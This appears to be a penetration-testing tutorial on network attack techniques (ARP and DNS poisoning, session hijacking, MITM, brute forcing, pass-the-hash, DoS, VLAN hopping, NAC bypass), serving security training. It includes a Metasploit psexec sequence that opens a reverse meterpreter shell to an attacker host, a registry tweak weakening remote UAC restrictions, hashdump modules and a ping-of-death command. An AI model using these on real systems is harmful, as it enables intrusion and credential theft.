Common Network Attack Techniques

Network Attack

Sniffing vs Eavesdropping

Sniffing is a straightforward way to passively obtain a lot of information about the network. You can use it to identify hosts, services, device types, protocols, subnets, IP addresses, and much more. Sniffing particularly takes advantage of cleartext protocols such as TCP, UDP, IP, ARP, ICMP, IGMP, LDAP, SNMP, SMB, FTP, DNS, DHCP, SMTP/POP3/IMAP, telnet, HTTP, TFTP, unsecured versions of SIP, unencrypted routing protocols, and many others. If the traffic is in cleartext, you can extract credentials, capture files and images, read messages, and obtain data meant for other users and machines.

Sniffers such as Wireshark have the ability to re-create entire TCP sessions and capture whole documents and images from the network. Even if the traffic payload is encrypted, you can still extrapolate source and destination addresses and ports, WLAN SSIDs and initialization vectors (encryption key data), and accompanying cleartext messages. If the traffic is encapsulated inside a VPN, you can still see VPN handshakes and outside wrapper IP addresses. Some packets, such as ARP messages, are distinct in structure and easily recognized, even when encrypted. They can still be captured and replayed in chosen ciphertext attacks such as WEP cracking.

Successful sniffing requires two conditions to be true:

  • The sniffer’s interface must be in promiscuous mode. This means it will pick up all traffic, no matter what the destination MAC is. Otherwise, it would ignore traffic not specifically addressed to it.
  • The traffic you want to sniff must directly pass by the sniffer’s interface. In other words, the sniffer must be on the same shared network segment as the traffic it is sniffing. This means you cannot sniff remotely!
  • If the devices are plugged into a hub, it will be no problem, as a hub will repeat all frames out all ports.
  • If the devices are plugged into a switch, you must poison the MAC table of the switch so it will repeat desired traffic out the port the sniffer is connected to.
  • If the devices are on a different subnet or VLAN, you must plant a sniffer on that segment and poison the switch’s MAC table to repeat the frames to the proper port.
  • If the segment is wireless, the sniffer must be within radio range.
  • If all of the desired traffic passes through a router, you can compromise the router to forward copies of that traffic to the attacker. Using a simple Generic Routing Encapsulation (GRE) tunnel will allow routers with access to the Internet to forward traffic anywhere in the world.

https://www.wireshark.org/

Eavesdropping

In general usage, eavesdropping is defined as the act of secretly listening to someone else’s private conversation. You can be within hearing range of the speaker, though perhaps in a place where they cannot see you, such as behind a door or partition, around the corner, or listening to another telephone extension on the same line. You could also plant a bug somewhere in the room that will transmit what it hears to a receiver some distance away.

In the world of penetration testing, although eavesdropping could include listening in on someone’s speech or a telephone conversation, it can also refer to other types of surveillance, including:

  • Planting a sniffer on a network.
  • Secretly placing a camera or microphone in the room.
  • Capturing VoIP packets off the network and replaying them.
  • Using your phone to record someone entering a password or PIN across the room.
  • Using a WiFi Pineapple or other man-in-the-middle device to capture wireless traffic.
  • Using an IMSI-catcher man-in-the-middle device to intercept cell phone calls.

ARP Poisoning

ARP poisoning is the deliberate mapping of an incorrect MAC address to a correct IP address. It is used to redirect traffic for malicious purposes and is the most common spoofing mechanism used on Ethernet and Wi-Fi networks. It allows an attacker to insert themselves in a man-in-the-middle attack between two legitimate hosts.

In TCP/IP, a packet cannot simply have a destination IP address before it is transmitted on a multi-access network. It must also have a corresponding OSI Layer 2 address. On Ethernet and Wi-Fi networks, this would be a MAC address. A host can use name resolution to look up a destination’s IP address, but it must also use ARP to learn the MAC address. Once the MAC-to-IP mapping is determined, that information is stored in the host’s ARP cache. Because the other devices can change their IP address, entries in the ARP cache age out and are updated every few minutes.

ARP cache

Unless you hard-code MAC-to-IP address mappings on your network, the relationship between a MAC address and an IP address is expected to be fluid and change. An attacker can take advantage of this in several ways:

  • You can send out a continuous stream of fake ARP replies declaring to the entire segment that your MAC is the correct one for the target IP address. In this way, when hosts intend to send a packet to the target, they are actually sending it to you.
  • You can send out a continuous stream of fake ARP replies declaring that your MAC address is the correct one for the default gateway (router). Any host wishing to send traffic to another network, including the Internet, must send it to you.
  • You can poison the MAC table of a switch with fake ARP replies so that it associates your victim’s MAC addresses to your switch port. Whenever the switch receives traffic destined for your victim, it will not only forward it out the switch port that the victim is connected to, but it will also forward a copy out your port.

If you wish to insert yourself between two hosts in a man-in-the-middle attack, you must poison the ARP cache of both hosts. In this way, they will communicate with each other through you. They will not realize that you are relaying all messages while capturing a copy for yourself. Because you are constantly streaming the spoofed MAC address to your victims, they never feel the need to perform their own ARP broadcast. They think they already have the mapping. When you stop ARP poisoning, the two hosts will eventually age your spoofed entries out of their ARP caches and learn each other’s correct MAC address. This process can take up to 10 minutes, unless you reboot the machines or manually clear their ARP caches.

ARP poisoning has its limits. Because you are spoofing Layer 2 addresses, the poisoner must be on the same network segment as the victims. If the victims are on another subnet, or on a remote network, you cannot conduct ARP poisoning against them. Similarly, if you are on a network that does not use MAC addresses, such as ATM, dial-up, or synchronous serial WAN links, ARP poisoning is useless.

Wireshark capture of ARP poisoning
ARP Poisoning Tools

Several tools can perform ARP poisoning, including:

  • Metasploit auxiliary/spoof/arp/arp_poisoning
  • Ettercap
  • Bettercap
  • dsniff
  • Cain & Abel
  • Arpspoof
  • Arpoison
  • MITMf

Some tools have other functionality built into them. For example, Cain & Abel can ARP poison, sniff the network, capture login sessions using a wide variety of protocols, crack intercepted encrypted passwords, record VoIP conversations, and more. The only effective way to defend against ARP poisoning is to hard-code all MAC-to-IP or MAC-to-switchport mappings. You can create manual entries in the various devices and on the switch.


TCP Session Hijacking

TCP session hijacking is the act of taking a user’s or client’s place after it has already established a TCP connection with a server. Typically, the user or client device has already authenticated, and the attacker wants to take over the connection without having to provide any credentials. This attack depends on several conditions to work:

  • The session must use a cleartext protocol that can be sniffed, such as telnet, FTP, or rlogin.
  • The attacker must be able to observe and correctly anticipate incrementing TCP sequence numbers (they jump pseudo-randomly to evade hijacking, but can be predicted after some observation).
  • The packets must not be digitally signed.

The high-level steps for TCP session hijacking are:

  1. Watch the client/server TCP sequence numbers increment (may require ARP poisoning).
  2. Send the client some spoofed TCP FIN packets so it thinks the server wants to end the session (alternatively, conduct and sustain some other denial-of-service attack against the client).
  3. Spoof your IP and/or MAC address to pretend you are the client.
  4. Once the client has disconnected, smoothly continue the conversation with the server.
TCP session hijacking
TCP Session Hijacking Tools

Common tools used for TCP session hijacking include:

  • Hunt
  • Juggernaut
  • Shijack
  • T-sight

Note: For more information about TCP session hijacking see https://www.sans.org/reading-room/whitepapers/windows/session-hijacking-windows-networks-2124


Man-in-the-Middle Attacks

A man-in-the-middle (MITM) attack is one in which the attacker inserts himself in the middle of a connection. It differs from a hijacking attack in that it does not replace the client, but rather acts as a relay between the client and server. Both sides think they are communicating directly with each other, but they are actually doing it through the MITM. The MITM then captures information that might otherwise be encrypted, or manipulates the data in some other way.

MITM example

Here are some common examples of an MITM attack:

  • SSL downgrading/stripping:
  1. The MITM inserts itself between a web client and server.
  2. The MITM creates a secure HTTPS session with the server.
  3. The MITM forces the client to accept either a cleartext HTTP session or a downgraded HTTPS session with a more vulnerable version of SSL.
  4. The MITM runs some type of sniffer that collects credentials as the user logs on.
  • Netcat relay:
  1. A target Windows Server is sitting behind a firewall.
  2. The firewall permits TCP 80 but not TCP 135 to pass through it.
  3. A Netcat listener has been planted on the target. It is waiting for incoming TCP 80 connections.
  4. When TCP 80 traffic comes to the target, Netcat rewrites the destination port to TCP 135 and relays the traffic to the DCOM service.
  5. An outside attacker is able to exploit DCOM even through a firewall.
  • A WiFi Pineapple or Pumpkin (rogue wireless access point) attracts Wi-Fi clients to connect to the network through it.
  • A Stingray or other IMSI catcher masquerades as a legitimate cell phone tower, inducing cell phones to make calls through it.

MITM requires some type of spoofing, usually ARP poisoning or changing IP addresses/port numbers. It can be thwarted if the client and server digitally sign their packets, or in the case of the website if the server requires HTTP Strict Transport Security (HSTS).

MITM Tools

Here are some common tools that are used in man-in-the-middle attacks:

  • ettercap
  • bettercap
  • Wireshark
  • ratched
  • mitmproxy
  • Netcat
  • Nmap
  • CERT Tapioca
  • Seth
  • Xerosploit
  • Metasploit mitm proxy modules
  • MITMf

Note: MITMf (Framework for Man-in-the-Middle Attacks) is a python script that contains a complete suite of attack features. For more information, see https://github.com/byt3bl33d3r/MITMf

Note: Do not confuse MITM with proxying. Although they are similar, their intent is different. MITM manipulates traffic generated by a legitimate host. Proxying manipulates traffic generated by an attacker.


DNS Cache Poisoning

DNS cache poisoning, also known as DNS spoofing, is an attack technique in which corrupt DNS data is entered into a DNS server’s lookup (resolver) cache. These fake records are then given to clients and other DNS servers.

There are millions of DNS servers worldwide, but most of them do not directly manage any records. When a client needs to resolve a name, it asks its local DNS server for the IP address. If the local server does not have a record, it asks other DNS servers for the information and then caches (stores) the result in case someone else needs it. If the attacker can insert false records into the DNS server’s cache, the DNS server will provide those false records to its clients. This can cause a cascading effect in which other DNS servers are poisoned by the original, passing along their corrupt records to more clients and DNS servers.

DNS cache poisoning example

Some foreign governments use DNS cache poisoning against their own DNS servers to prevent their citizens from accessing certain types of content on the Internet. If you can’t directly attack the DNS server, you can also masquerade as the local DNS server, sending fake replies to clients as they try to resolve names.

Unfortunately, the trusting and open nature of DNS makes it intrinsically vulnerable to cache poisoning and spoof attacks. The Kaminsky Bug (CVE-2008-1447) underscored the challenge of trying to fix a fundamental flaw in a protocol that basically runs the Internet. DNSSEC (attaching digital signatures to DNS records) was considered to be the only real remedy, but even 10 years later it is still not widely implemented.

DNS Cache Poisoning Tools

DNS cache poisoning and spoofing tools include:

  • Metasploit auxiliary/spoof/dns/bailiwicked_host
  • ettercap with the dns_spoof plugin
  • MITMf
  • Kali Dnsspoof
  • ARPwner
  • Kali DNSchef

Name Resolution Exploits

In addition to DNS, there are other name resolution exploits the pen tester can use. Originally, Microsoft Windows computers did not use DNS to resolve names. They used NetBIOS Name Service (NBNS) queries. If a Microsoft WINS server or a local lmhosts text file didn’t have the needed information, then the host would send out a special broadcast in the hope that the desired server would hear it and respond. Starting with Windows Vista, NetBIOS-NS was replaced with the Link-Local Multicast Name Resolution protocol. It uses multicasting rather than broadcasting, and supports both IPv4 as well as IPv6. If a client can’t resolve a name using DNS, it can send out an LLMNR multicast to the local segment to try to resolve the name.

Windows computers follow a specific order to resolve names:

  1. Check if the destination is itself.
  2. Check if the name is in the DNS resolver caches already.
  3. Check if the name is in the %systemroot%\system32\drivers\etc\hosts file.
  4. Query the DNS server.
  5. Send an LLMNR multicast to 224.0.0.252 (IPv6 FF02::1:3), UDP port 5355.
  6. Send a NetBIOS name query broadcast to 255.255.255.255, UDP port 137.

It is possible to exploit name resolution at any of these levels (except the first). The attacker could:

  • Poison the DNS server or client resolver cache.
  • Edit the client’s hosts file.
  • Enable a tool to listen for LLMNR/NBNS queries and respond with itself as the desired destination. When the client then tries to connect, it prompts the user to log on based on the protocol the client is using, thus harvesting the user’s credentials.

Note: Kali’s responder can also listen for multicast DNS (MDNS). This is a special implementation of DNS in which the client does not need to know the IP address of the DNS server, instead sending out a multicast to 224.0.0.251 (IPv6 FF02::FB) to UDP 5353 to perform name resolution. It is used by Apple Bonjour, Avahi, and to a limited extent Android and Windows 10.

Name Resolution Attack Tools

Tools you can use to conduct name resolution attacks include:

  • Kali responder
  • Metasploit auxiliary/spoof/llmnr/llmnr_response
  • MITMf
Kali responder

Network Authentication Brute Forcing

Most network-based services can be configured to lock a user account after a certain number of failed logon attempts. Some services, however, do not implement this type of policy. Others exempt the administrator or root from the policy, so that you will never be locked out as you repeatedly try to guess the password. You can dramatically speed up the process by using an automated brute force attack. Brute forcing tools can use different protocols such as SMB, telnet, SMTP, POP3/IMAP, HTTP, FTP, and others to target various network services. You supply the tool with a wordlist of user names and passwords which it will try until it succeeds or exhausts the list.

Examples of brute forcing tools include:

  • Hydra
  • Medusa
  • Ncrack
  • NetBIOS Auditing Tool
  • AET2 Brutus
  • Aircrack-ng
  • John the Ripper
  • Rainbow Crack
  • Cain & Abel
  • L0phtCrack
  • Ophcrack
  • Hashcat
  • Metasploit modules:
  • auxiliary/scanner/http/http_login
  • auxiliary/scanner/smb/smb_login
  • auxiliary/scanner/telnet/telnet_login
  • auxiliary/scanner/snmp/snmp_login
  • auxiliary/scanner/ssh/ssh_login

Note: Metasploit has many brute forcing tools. To see a list of choices, conduct a search at the msfconsole by entering

search -type auxiliary -S _login

Pass the Hash Attacks

Sometimes a password will be too long or complex to crack. In that case, you could instead try to pass the hash. In this type of attack, when you log on to the target operating system or application, you provide the user name and the hash of the password, rather than the password itself. You obtain the hash by inducing the operating system or application to dump them from RAM, the Windows Registry, or a credentials file. Metasploit has many hashdump-related modules you can use against Linux, Windows, applications, and other platforms. Most of them are post modules you run after you have compromised the target and obtained a Meterpreter prompt. Here are a few for collecting hashes:

post/windows/gather/smart_hashdump
post/linux/gather/hashdump
post/pro/multi/gather/hashdump
post/windows/gather/credentials/domain_hashdump
post/windows/gather/credentials/mssql_local_hashdump
post/windows/gather/credentials/skype
post/windows/gather/credentials/avira_password
post/windows/gather/credentials/mcafee_vse_hashdump
Dumping hashes

Note: To obtain a complete list of hashdump-related Metasploit tools, conduct a search at the Metasploit console, such as search hash platform:windows.

Once you have the hashes, there are several tools you can use to test usability, pass, or crack them, including:

  • Metasploit modules exploit/windows/smb/psexec and auxiliary/scanner/smb/smb_login
  • Hydra
  • Medusa
  • Veil-Catapult
Pass the hash attack

Passing the hash does not work in all cases. For example, Windows Defender Credential Guard protects against this. You wouldn’t even be able to pass the Administrator hash. You would need to turn off Windows Defender first. Separately, if Windows Defender is not running on the target, you might have to edit the Registry. Windows operating systems starting with Vista have a User Account Control (UAC) policy setting that disallows other local administrators from running privileged tasks across the network. If you want to pass the hash of another local admin, you could disable the restriction by navigating the Registry to HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System, and then creating a DWORD entry of LocalAccountTokenFilterPolicy with a value of 1.

Note: For information about disabling Windows Defender Credential Guard, see https://docs.microsoft.com/en-us/windows/security/identity-protection/credential-guard/credential-guard-manage.

Note: For an interesting article on disabling the LocalAccountTokenFilterPolicy, see http://www.harmj0y.net/blog/redteaming/pass-the-hash-is-dead-long-live-localaccounttokenfilterpolicy/


Pass-the-Hash

Let’s use a Pass-The-Hash attack to gain shell access to the DATABASE computer without needing to brute force the password plaintext.  This is a “feature” of older versions of Windows.

See Also: https://security.stackexchange.com/questions/141681/can-an-intruder-still-possibly-succeed-with-pass-the-hash-or-pass-the-ticket-on

msf6> use exploit/windows/smb/psexec
msf6> set RHOST 172.16.30.88    # The DATABASE host
msf6> set SMBUser Administrator
msf6> set SMBPass TheHashedPassword
msf6> set PAYLOAD windows/x64/meterpreter/reverse_tcp
msf6> set LHOST 172.16.20.55    # Security-Desk
msf6> set LPORT 4445            # We need a different port since 4444 is already in use by Meterpreter on the Domain Controller
msf6> exploit -j
msf6> sessions

DoS Attacks

A denial-of-service (DoS) attack is one that prevents the target from performing its normal duties on the network. Although this is typically accomplished by flooding the server with network traffic, it can also be accomplished by crashing a service or consuming all of the server’s resources, including CPU, memory, disk space, or allowed client connections. The attack can be protocol-, operating system-, or service-specific. You can try crafting packets to evade IDS or firewall detection. For network-traffic-based DoS attacks, a single attacker is unlikely to have much (if any) impact. The most serious exploits are distributed denial-of-service (DDoS) attacks, in which thousands or hundreds of thousands of machines (typically in a botnet) are coordinated to attack a single target.

The following table summarizes common DoS attack types and tools.

DoS Attack TypeDescriptionTool Examples
Packet floodCreate and send massive amounts of TCP, UDP, ICMP, or random packet traffic to target. Can include different TCP flag variants.hping3, nemesy, XOIC, Low Orbit Ion Cannon (LOIC), Spike DDoS Toolkit, xcrush-20
SYN floodCreate and send massive amounts of TCP SYN packets.hping3, Metasploit auxiliary/dos/tcp/synflood, Spike DDoS Toolkit, xcrush-20
Ping of DeathSend ICMP ECHO REQUESTs that are larger than 65,536 bytes, causing the target to crash, freeze, or reboot.jolt, xcrush-20, eugenics.pl, Crazy Pinger, ping.exe; e.g., ping -l 65510 your.target.ip.address
ICMP/UDP fragmentation attackVariant of UDP flood or Ping of Death. Send the target UDP or ICMP fragments that when reassembled are too large for the network’s MTU.hping3, spike.sh, eugenics.pl
TCP fragmentation attackSend the target TCP fragments that have overlapping sequence numbers and cannot be reassembled. Windows NT, Windows 95, and Linux versions prior to version 2.1.63 are most vulnerable.Teardrop, NewTear, Bonk, Boink, Targa, xcrush-20, eugenics.pl
Smurf attackSend large numbers of spoofed ICMP ECHO REQUESTs to intermediate devices that all respond to a single target.hping3, xcrush-20, eugenics.pl
Fraggle attackSame as a Smurf attack, except uses UDP instead of ICMP.xcrush-20, eugenics.pl
Land attackSend spoofed packet where source and destination IP are the same. The target floods itself with packets.hping3, Land, Targa, LaTierra, xcrush-20, eugenics.pl
SMB malformed requestSend a malformed request to an SMB named pipe causing a Blue Stop Screen (Blue Screen of Death) on Windows.SMBDie, Bitchslap
SlowlorisKeep as many fake web connections as possible open for as long as possible, until the maximum number of allowed connections is reached. Allows one web server to take down another without impacting other ports or services on the target network.Slowloris script, R-U-Dead-Yet (RUDY)
NTP amplificationSend spoofed NTP queries to publicly available NTP servers to overwhelm a target with UDP traffic.NTPDos, NTPDoser, Saddam
HTTP flood attackUse seemingly legitimate HTTP GET or POST requests to attack a web server. Does not require spoofing or malformed packets, but can consume a high amount of resources with a single request.High Orbit Ion Cannon (HOIC), Low Orbit Ion Cannon (LOIC), XOIC, HULK, DDOSIM, Tor’s Hammer, PyLoris, OWASP DOS HTTP POST, DAVOSET, GoldenEye HTTP Denial Of Service Tool, Spike DDoS Toolkit
DNS flood attackConsume all CPU or memory of a DNS server with a flood of requests.zodiac, DNS Flood, Hyenae, Spike DDoS Toolkit
DNS amplification attackLike Smurf or other amplification attacks, multiple public DNS servers receive spoofed queries and respond to a target.Saddam, Tsunami, DDoS Attack

Note: Many of these tools can be used for multiple DoS attack types. You may find variants with different features.

DoS attack example

The following figure shows the command and output from a web server SYN flood generated from the hping3 tool.

Hping3 web server SYN flood

Note: You can search for Metasploit DoS modules at the msf console. For example, to search for DoS attacks that involve DNS, enter search type:auxiliary name:dos -S dns.

Stress Testing

Stress testing is a euphemism for conducting a denial-of-service attack against a target. You can use scripts, bots, or other tools to deliberately and intensively attack a server or service to see how it performs. Some stress testers simply flood the target with distributed denial-of-service (DDoS) traffic. Others are application-specific and simulate very high numbers of actual user requests. An administrator might use stress testing to ensure that a website can withstand attacks or abnormally high traffic.

Because the intent is to render the service non-functional, a pen tester would need authorization to stress test a production machine. Additionally, the client would need to understand the implications of stress testing live servers. There are many commercially available stress testing services and products available online. There are also several sites online that will rent you their illegal botnet for “stress testing” purposes. These sites charge a nominal price by the hour.


VLAN Hopping

VLAN hopping is the act of illegally moving from one VLAN to another. A VLAN (virtual LAN) is a logical grouping of switch ports that can extend across any number of switches on an Ethernet campus. Its purpose is to organize devices by security need and/or to limit the impact of broadcast traffic on the larger network. A switched network can have (nearly) any number of VLANs that extend across the campus, each being its own broadcast domain with its own subnet ID. Metro Ethernet Metropolitan Area Networks (MANs) can even extend a company’s VLANs to other locations around town. The most common use cases are to segregate the network by department, device type, or security level.

Because VLANs are logically segmented away from the rest of the network, you would ordinarily have to use a router to move traffic between them. This allows you to set access control lists and other policies to control which hosts can access hosts in other VLANs. Ordinarily, a switch port or Wi-Fi connection can only belong to one VLAN at a time, and cannot change unless specifically configured by the network administrator. This means that whatever port or SSID the device connects to determines the VLAN that device is in. You would have to plug into a different port or connect to a different WLAN to change your VLAN. Or, if permitted, a router would have to route your traffic from your existing VLAN to other VLANs. There are, however, ways to bypass this restriction. Some examples include:

  • Overflowing the MAC table on a vulnerable switch so that it behaves like a hub, repeating frames out all ports.
  • Configuring the interface of an attacker machine to become a trunk port. It will then negotiate an unauthorized trunk link with the switch, which allows traffic from any VLAN to flow over that link. This allows the attacker machine to then apply the desired VLAN tag to malicious packets. The switch will then deliver those packets to the restricted VLAN.
Using an unauthorized trunk link to VLAN hop

One popular VLAN hopping tool is Frogger. It is a command-line tool that automatically sets up a trunk link, identifies VLAN IDs that are in use, and tags your traffic for the desired VLAN.

https://github.com/nccgroup/vlan-hopping—frogger

Note: For more information about Frogger, see https://www.commonexploits.com/frogger-the-vlan-hopper/.

Note: In some cases, VLAN membership for a device is dynamically determined by its MAC address. The network administrator pre-creates a list of VLANs and the MAC addresses that belong to them. When the device is plugged in, its MAC address is checked against the VLAN database and the corresponding VLAN is dynamically assigned to that port.


NAC Bypass Attacks

Network Access Control (NAC) is a system meant to restrict device access to the internal network. It disallows unauthorized or “unhealthy” devices from connecting. “Unhealthy” devices are ones that do not have the latest antivirus update, security patch, proper firewall setting, security policy settings, etc. Usually unauthorized or unhealthy devices are redirected to a captive guest portal where they remain quarantined in a separate VLAN until they are given authorization or they remediate all of their issues. For NAC to work, it requires infrastructure devices to enforce the restrictions. These enforcers are typically points of entry such as a network switch, a WAP, or a remote access/VPN server. They can also be DHCP servers. Enforcers relay client connection requests to the Network Policy Server (NPS) and then permit or deny the connection based on the decision based on the NPS.

Although a pen tester might be able to make unauthorized changes to the NPS, this would entail a lot of work. There are a few easier ways to try to bypass NAC. The most common include:

  • Spoofing the MAC and IP addresses of a device that cannot natively participate in NAC, such as a VoIP phone or printer. These devices will be whitelisted by the administrator, and often there is no mechanism to verify that MAC address truly belongs to the device.
  • Using IPv6 rather than IPv4 on the unauthorized device. Most servers have IPv6 addresses by default, and are running IPv6, but administrators still forget to include IPv6 rules in firewalls and NAC policy.
  • Using a rogue wireless access point to get an authorized device to connect with an attacker machine. The attacker machine compromises the authorized device, then uses it to relay malicious traffic into the protected network.
Spoofing the MAC of an approved device to bypass NAC


Guidelines for Exploiting Network-Based Vulnerabilities

Here are some guidelines you can follow when exploiting network-based vulnerabilities:

  • Conduct active reconnaissance, including scanning and fingerprinting on the target first, then research possible exploits you can use.
  • Use sniffing and eavesdropping to obtain information needed for the exploit.
  • Use ARP poisoning when conducting man-in-the-middle attacks.
  • Use hijacking to take over client sessions.
  • Choose your exploits based on the target service or protocol.
  • Use DNS cache poisoning and other name resolution exploits to redirect targets when ARP poisoning isn’t practical.
  • Use network authentication brute forcing to crack passwords.
  • Use pass the hash attacks when password cracking isn’t practical.
  • Be careful when using DoS or stress testing attacks, as they are likely to make the server or service unavailable.
  • Use VLAN hopping if you need access to a restricted VLAN.
  • Use NAC bypassing techniques if points of entry into the network are controlled by a network policy or NAC server.

Leave a Reply

Your email address will not be published. Required fields are marked *